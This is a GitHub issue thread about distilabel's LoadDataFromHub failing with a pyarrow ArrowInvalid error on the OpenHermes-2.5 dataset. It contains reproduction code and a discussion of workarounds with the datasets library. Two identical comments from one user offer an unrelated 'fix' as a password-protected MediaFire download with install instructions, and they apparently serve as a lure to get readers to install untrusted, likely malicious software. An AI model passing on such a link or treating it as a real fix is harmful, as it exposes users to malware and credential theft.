### ISSUE TITLE
[BUG] cannot load openhermes-2.5

### ISSUE THREAD

**Issue by zye1996** [argilla-io/distilabel#930]
**Describe the bug**
cannot load openhermes-2.5

**To Reproduce**
Code to reproduce
```python
import os
from pathlib import Path
from typing import Any, Dict, List

from distilabel.pipeline import Pipeline
from distilabel.steps import LoadDataFromHub
from distilabel.steps import KeepColumns

dataset_hub_url = "teknium/OpenHermes-2.5"
data_folder = "test"

selected_col = ["id", "conversations", "language", "category", "source"]

batch_size = 1000

with Pipeline(
            name="data conversion pipeline",
            description=(
                    "convert dataset to shareGPT format"
            ),
    ) as pipeline:

    load_dataset = LoadDataFromHub(
        repo_id=dataset_hub_url,
        split="train",
        streaming=False,
        batch_size=batch_size
    )

    load_dataset.load()
    # keep_columns = KeepColumns(
    #     columns=selected_col,
    # )

    # load_dataset >> keep_columns

if __name__ == "__main__":
    distiset = pipeline.run(
        use_cache=False,
    )

    distiset.save_to_disk(Path(data_folder),
                          save_card=False,
                          save_pipeline_log=False,
                          save_pipeline_config=False)





```

**Expected behaviour**
error with the following message

```
pyarrow.lib.ArrowInvalid: Column 6: In chunk 0: Invalid: List child array invalid: Invalid: Struct child array #2 has length smaller than expected for struct array (1000 < 2000)
```

**Screenshots**
If applicable, add screenshots to hel
![Screenshot 2024-08-26 at 6 06 55 PM](https://github.com/user-attachments/assets/016e8ade-8d35-40cb-9247-c088a9b2b4b9)
p explain your problem.

**Desktop (please complete the following information):**
 - Package version:1.3.2
 - Python version: 3.10.0

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zye1996** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

can you point me to the related issue?

**Comment by zye1996** [comment]
> Hi @zye1996 there's no pipeline to generate data, if all you want to do is download the dataset from the hub and save it to disk, you can use the `datasets` library:
> 
> ```python
> from datasets import load_dataset
> ds = load_dataset("teknium/OpenHermes-2.5", split="train")
> ds.save_to_disk("path/to/disk")
> ```

I was trying to filter a couple columns using keep columns using the pipleine. However, it fails at loading the dataset stage

**Comment by plaguss** [comment]
Will take a look at it, but you could do the same using the `select_columns` method from the dataset: https://huggingface.co/docs/datasets/v2.21.0/en/package_reference/main_classes#datasets.Dataset.select_columns

**Comment by zye1996** [comment]
> Will take a look at it, but you could do the same using the `select_columns` method from the dataset: https://huggingface.co/docs/datasets/v2.21.0/en/package_reference/main_classes#datasets.Dataset.select_columns

This is true. But it will also block other pipeline such as text generation. 

I am not sure whether it is a pyarrow problem, I am using the latest pyarrow
